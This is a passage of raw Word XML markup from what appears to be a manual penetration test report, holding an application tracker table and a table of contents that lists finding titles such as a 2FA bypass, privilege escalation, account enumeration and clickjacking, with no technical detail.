          </w:tcPr>
          <w:p w14:paraId="3BA82208" w14:textId="77777777" w:rsidR="006509D2" w:rsidRPr="00397EF0" w:rsidRDefault="006509D2" w:rsidP="009453F5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Application Tracker ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6480" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C2E5104" w14:textId="77777777" w:rsidR="006509D2" w:rsidRPr="00397EF0" w:rsidRDefault="00F03F96" w:rsidP="00861512">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F03F96">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>AppID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F03F96">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> #: 933 BIT#: PHLDR0010956</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006509D2" w:rsidRPr="00397EF0" w14:paraId="0AB910A0" w14:textId="77777777" w:rsidTr="00175EC0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3348" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FDB478C" w14:textId="77777777" w:rsidR="006509D2" w:rsidRPr="00397EF0" w:rsidRDefault="006509D2" w:rsidP="009453F5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Assessment Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6480" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A549A88" w14:textId="77777777" w:rsidR="006509D2" w:rsidRPr="00397EF0" w:rsidRDefault="00F03F96" w:rsidP="00861512">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Manual Penetration Test (MPT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78BF8CF5" w14:textId="77777777" w:rsidR="004E5E18" w:rsidRPr="00397EF0" w:rsidRDefault="004E5E18" w:rsidP="004E5E18">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9710"/>
      </w:tblGrid>
      <w:tr w:rsidR="000A5DB8" w:rsidRPr="00397EF0" w14:paraId="241BFDE0" w14:textId="77777777" w:rsidTr="00646DF5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9936" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:id w:val="790401764"/>
              <w:docPartObj>
                <w:docPartGallery w:val="Table of Contents"/>
                <w:docPartUnique/>
              </w:docPartObj>
            </w:sdtPr>
            <w:sdtEndPr/>
            <w:sdtContent>
              <w:bookmarkStart w:id="0" w:name="_GoBack" w:displacedByCustomXml="prev"/>
              <w:bookmarkEnd w:id="0" w:displacedByCustomXml="prev"/>
              <w:p w14:paraId="678F941A" w14:textId="77777777" w:rsidR="000A5DB8" w:rsidRPr="00397EF0" w:rsidRDefault="00646DF5">
                <w:pPr>
                  <w:pStyle w:val="TOCHeading"/>
                  <w:rPr>
                    <w:color w:val="auto"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00397EF0">
                  <w:rPr>
                    <w:color w:val="auto"/>
                  </w:rPr>
                  <w:t xml:space="preserve">Table of </w:t>
                </w:r>
                <w:r w:rsidR="000A5DB8" w:rsidRPr="00397EF0">
                  <w:rPr>
                    <w:color w:val="auto"/>
                  </w:rPr>
                  <w:t>Contents</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="536FCB4C" w14:textId="77777777" w:rsidR="00D04492" w:rsidRDefault="000A5DB8">
                <w:pPr>
                  <w:pStyle w:val="TOC1"/>
                  <w:tabs>
                    <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
                  </w:tabs>
                  <w:rPr>
                    <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                    <w:noProof/>
                    <w:sz w:val="22"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00397EF0">
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidRPr="00397EF0">
                  <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
                </w:r>
                <w:r w:rsidRPr="00397EF0">
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:hyperlink w:anchor="_Toc10703664" w:history="1">
                  <w:r w:rsidR="00D04492" w:rsidRPr="006729B1">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                      <w:i/>
                      <w:noProof/>
                    </w:rPr>
                    <w:t>High-Risk Findings</w:t>
                  </w:r>
                  <w:r w:rsidR="00D04492">
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:tab/>
                  </w:r>
                  <w:r w:rsidR="00D04492">
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="begin"/>
                  </w:r>
                  <w:r w:rsidR="00D04492">
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:instrText xml:space="preserve"> PAGEREF _Toc10703664 \h </w:instrText>
                  </w:r>
                  <w:r w:rsidR="00D04492">
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                  </w:r>
                  <w:r w:rsidR="00D04492">
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="separate"/>
                  </w:r>
                  <w:r w:rsidR="00D04492">
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:t>4</w:t>
                  </w:r>
                  <w:r w:rsidR="00D04492">
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="end"/>
                  </w:r>
                </w:hyperlink>
              </w:p>
              <w:p w14:paraId="02D70F09" w14:textId="77777777" w:rsidR="00D04492" w:rsidRDefault="00D04492">
                <w:pPr>
                  <w:pStyle w:val="TOC2"/>
                  <w:tabs>
                    <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
                  </w:tabs>
                  <w:rPr>
                    <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                    <w:noProof/>
                    <w:sz w:val="22"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                </w:pPr>
                <w:hyperlink w:anchor="_Toc10703665" w:history="1">
                  <w:r w:rsidRPr="006729B1">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                      <w:noProof/>
                    </w:rPr>
                    <w:t>H1 – Security Control Bypass – 2FA – Open</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:tab/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="begin"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:instrText xml:space="preserve"> PAGEREF _Toc10703665 \h </w:instrText>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="separate"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:t>4</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="end"/>
                  </w:r>
                </w:hyperlink>
              </w:p>
              <w:p w14:paraId="0F687961" w14:textId="77777777" w:rsidR="00D04492" w:rsidRDefault="00D04492">
                <w:pPr>
                  <w:pStyle w:val="TOC2"/>
                  <w:tabs>
                    <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
                  </w:tabs>
                  <w:rPr>
                    <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                    <w:noProof/>
                    <w:sz w:val="22"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                </w:pPr>
                <w:hyperlink w:anchor="_Toc10703666" w:history="1">
                  <w:r w:rsidRPr="006729B1">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                      <w:noProof/>
                    </w:rPr>
                    <w:t>H2 – Weak Password Policy – Open</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:tab/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="begin"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:instrText xml:space="preserve"> PAGEREF _Toc10703666 \h </w:instrText>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="separate"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:t>5</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="end"/>
                  </w:r>
                </w:hyperlink>
              </w:p>
              <w:p w14:paraId="36053F0E" w14:textId="77777777" w:rsidR="00D04492" w:rsidRDefault="00D04492">
                <w:pPr>
                  <w:pStyle w:val="TOC2"/>
                  <w:tabs>
                    <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
                  </w:tabs>
                  <w:rPr>
                    <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                    <w:noProof/>
                    <w:sz w:val="22"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                </w:pPr>
                <w:hyperlink w:anchor="_Toc10703667" w:history="1">
                  <w:r w:rsidRPr="006729B1">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                      <w:noProof/>
                    </w:rPr>
                    <w:t>H3 – Security Control Bypass - Recaptcha – Open</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:tab/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="begin"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:instrText xml:space="preserve"> PAGEREF _Toc10703667 \h </w:instrText>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="separate"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:t>7</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="end"/>
                  </w:r>
                </w:hyperlink>
              </w:p>
              <w:p w14:paraId="0250CB24" w14:textId="77777777" w:rsidR="00D04492" w:rsidRDefault="00D04492">
                <w:pPr>
                  <w:pStyle w:val="TOC2"/>
                  <w:tabs>
                    <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
                  </w:tabs>
                  <w:rPr>
                    <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                    <w:noProof/>
                    <w:sz w:val="22"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                </w:pPr>
                <w:hyperlink w:anchor="_Toc10703668" w:history="1">
                  <w:r w:rsidRPr="006729B1">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                      <w:noProof/>
                    </w:rPr>
                    <w:t>H4 – Privilege Escalation – Open</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:tab/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="begin"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:instrText xml:space="preserve"> PAGEREF _Toc10703668 \h </w:instrText>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="separate"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:t>9</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="end"/>
                  </w:r>
                </w:hyperlink>
              </w:p>
              <w:p w14:paraId="708DC964" w14:textId="77777777" w:rsidR="00D04492" w:rsidRDefault="00D04492">
                <w:pPr>
                  <w:pStyle w:val="TOC1"/>
                  <w:tabs>
                    <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
                  </w:tabs>
                  <w:rPr>
                    <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                    <w:noProof/>
                    <w:sz w:val="22"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                </w:pPr>
                <w:hyperlink w:anchor="_Toc10703669" w:history="1">
                  <w:r w:rsidRPr="006729B1">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                      <w:i/>
                      <w:noProof/>
                    </w:rPr>
                    <w:t>Medium-Risk Findings</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:tab/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="begin"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:instrText xml:space="preserve"> PAGEREF _Toc10703669 \h </w:instrText>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="separate"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:t>13</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="end"/>
                  </w:r>
                </w:hyperlink>
              </w:p>
              <w:p w14:paraId="0A73ECB5" w14:textId="77777777" w:rsidR="00D04492" w:rsidRDefault="00D04492">
                <w:pPr>
                  <w:pStyle w:val="TOC2"/>
                  <w:tabs>
                    <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
                  </w:tabs>
                  <w:rPr>
                    <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                    <w:noProof/>
                    <w:sz w:val="22"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                </w:pPr>
                <w:hyperlink w:anchor="_Toc10703670" w:history="1">
                  <w:r w:rsidRPr="006729B1">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                      <w:noProof/>
                    </w:rPr>
                    <w:t>M1 – Account Enumeration – Open</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:tab/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="begin"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:instrText xml:space="preserve"> PAGEREF _Toc10703670 \h </w:instrText>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="separate"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:t>13</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="end"/>
                  </w:r>
                </w:hyperlink>
              </w:p>
              <w:p w14:paraId="1C4C8B09" w14:textId="77777777" w:rsidR="00D04492" w:rsidRDefault="00D04492">
                <w:pPr>
                  <w:pStyle w:val="TOC2"/>
                  <w:tabs>
                    <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
                  </w:tabs>
                  <w:rPr>
                    <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                    <w:noProof/>
                    <w:sz w:val="22"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                </w:pPr>
                <w:hyperlink w:anchor="_Toc10703671" w:history="1">
                  <w:r w:rsidRPr="006729B1">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                      <w:noProof/>
                    </w:rPr>
                    <w:t>M2 – Information Exposure through Caching – Open</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:tab/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="begin"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:instrText xml:space="preserve"> PAGEREF _Toc10703671 \h </w:instrText>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="separate"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:t>16</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="end"/>
                  </w:r>
                </w:hyperlink>
              </w:p>
              <w:p w14:paraId="3F7EA359" w14:textId="77777777" w:rsidR="00D04492" w:rsidRDefault="00D04492">
                <w:pPr>
                  <w:pStyle w:val="TOC2"/>
                  <w:tabs>
                    <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
                  </w:tabs>
                  <w:rPr>
                    <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                    <w:noProof/>
                    <w:sz w:val="22"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                </w:pPr>
                <w:hyperlink w:anchor="_Toc10703672" w:history="1">
                  <w:r w:rsidRPr="006729B1">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                      <w:noProof/>
                    </w:rPr>
                    <w:t>M3 – Frameable Response/Clickjacking – Open</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:tab/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="begin"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:instrText xml:space="preserve"> PAGEREF _Toc10703672 \h </w:instrText>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="separate"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:t>17</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="end"/>
                  </w:r>
                </w:hyperlink>
              </w:p>
              <w:p w14:paraId="784D6751" w14:textId="77777777" w:rsidR="00D04492" w:rsidRDefault="00D04492">
                <w:pPr>
                  <w:pStyle w:val="TOC1"/>
                  <w:tabs>
                    <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
                  </w:tabs>
                  <w:rPr>
                    <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                    <w:noProof/>
                    <w:sz w:val="22"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                </w:pPr>
                <w:hyperlink w:anchor="_Toc10703673" w:history="1">
                  <w:r w:rsidRPr="006729B1">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                      <w:i/>
                      <w:noProof/>
                    </w:rPr>
                    <w:t>Low-Risk Findings</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:tab/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="begin"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:instrText xml:space="preserve"> PAGEREF _Toc10703673 \h </w:instrText>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="separate"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:t>19</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="end"/>
                  </w:r>
                </w:hyperlink>
              </w:p>
              <w:p w14:paraId="4C819466" w14:textId="77777777" w:rsidR="00D04492" w:rsidRDefault="00D04492">
                <w:pPr>
                  <w:pStyle w:val="TOC2"/>
                  <w:tabs>
                    <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
                  </w:tabs>
                  <w:rPr>
                    <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                    <w:noProof/>
                    <w:sz w:val="22"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                </w:pPr>
                <w:hyperlink w:anchor="_Toc10703674" w:history="1">
                  <w:r w:rsidRPr="006729B1">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                      <w:noProof/>
                    </w:rPr>
                    <w:t>L1 – Missing Safeguard: Cross-Site Scripting Protection Header – Open</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:tab/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="begin"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:instrText xml:space="preserve"> PAGEREF _Toc10703674 \h </w:instrText>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="separate"/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:t>19</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
                    </w:rPr>
                    <w:fldChar w:fldCharType="end"/>
                  </w:r>
                </w:hyperlink>
              </w:p>
              <w:p w14:paraId="2226DE34" w14:textId="77777777" w:rsidR="00D04492" w:rsidRDefault="00D04492">
                <w:pPr>
                  <w:pStyle w:val="TOC2"/>
                  <w:tabs>
                    <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
                  </w:tabs>
                  <w:rPr>
                    <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                    <w:noProof/>
                    <w:sz w:val="22"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                </w:pPr>
                <w:hyperlink w:anchor="_Toc10703675" w:history="1">
                  <w:r w:rsidRPr="006729B1">
                    <w:rPr>
                      <w:rStyle w:val="Hyperlink"/>
                      <w:noProof/>
                    </w:rPr>
                    <w:t>L2 – Error Conditions, Return Values, Status Codes – Open</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:webHidden/>
